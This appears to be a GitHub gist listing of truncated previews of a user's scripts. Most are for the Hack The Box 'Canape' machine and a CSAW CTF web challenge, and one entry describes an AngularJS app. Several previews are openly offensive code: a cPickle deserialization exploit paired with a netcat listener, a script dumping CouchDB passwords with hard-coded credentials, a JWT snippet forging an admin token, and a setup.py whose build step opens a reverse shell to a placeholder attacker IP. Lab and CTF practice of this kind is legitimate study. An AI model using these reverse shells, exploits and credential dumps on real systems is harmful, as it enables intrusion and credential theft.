This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
###Custom Dirb Script for Canape | |
import requests as rq | |
import sys | |
url = "http://10.10.10.70/" | |
homepage = "Welcome to the future home page" | |
wordlist = "common" | |
found = [] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
###Canape cPickle Exploit (run nc -nlvp 1338 separately.) | |
#Change host/port to your own ip/desired port. | |
LHOST = "10.10.15.xxx" | |
LPORT = "1338" | |
import requests as rq #For posting request | |
import cPickle #For generating payload | |
import hashlib #For generating MD5 hash as id | |
import os #For creating shell object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
###Retrieves passwords for Canape CouchDB Users | |
import requests as rq | |
url = "http://george:george@localhost:5984/passwords/" | |
alldocs = rq.get(url+"_all_docs").json() | |
for i in alldocs["rows"]: | |
entry_id = str(i["id"]) | |
ret = rq.get(url+entry_id).json() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from distutils.command.build_py import build_py as _build_py | |
from distutils.command.build_py import build_py as _build_py | |
from distutils.core import setup | |
import socket, subprocess, os | |
class build_py(_build_py): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(("10.10.15.xxx",1339)) | |
os.dup2(s.fileno(),0) | |
os.dup2(s.fileno(),1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html | |
Code spread across the 4 attached files. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests as rq | |
import jwt | |
tokenData = { | |
'exp': 1538956189, | |
'iat': 0, | |
'sub': 0, | |
'admin': True | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests as rq | |
for i in range(1,1000): | |
headers = { | |
"bring_back_random_click":"hhhhhhhhhh", | |
} | |
req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers) | |
if len(req.text) != 243: | |
print req.text[:-1] | |
break |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests as rq | |
import json | |
url = "http://web.chal.csaw.io:10106/" | |
def register(userpass): | |
global auth | |
if len(userpass) < 8: | |
return "Please enter at least 8 characters." | |
details = { | |
"username":userpass, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def stats(): | |
global auth | |
userinfo = rq.get("http://web.chal.csaw.io:10106/user", headers=auth).json() | |
userclickers = json.loads(rq.get("http://web.chal.csaw.io:10106/clicker/user", headers=auth).json().replace("'",'"')) | |
print("##########\nStats for "+userinfo['username']+":") | |
print("##########") | |
print("Money: "+str(userinfo['money'])) | |
print("##########\nClicker Name | Clicker Value | Clicker Price\n"+("----------"*5)) | |
for count, i in enumerate(userclickers): | |
print(i['name']+" | "+str(i['value'])+" | "+str(i['price'])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def click(clicker): | |
global authorization | |
data={'name':clicker} | |
req = rq.post("http://web.chal.csaw.io:10106/clicker/click", headers=authorization, json=data) | |
if req.json()['status'] == "success": | |
return "Success!" | |
elif req.json()['message'] == "Clicker not owned": | |
return "Clicker not owned." | |
else: | |
return "Clicker does not exist." |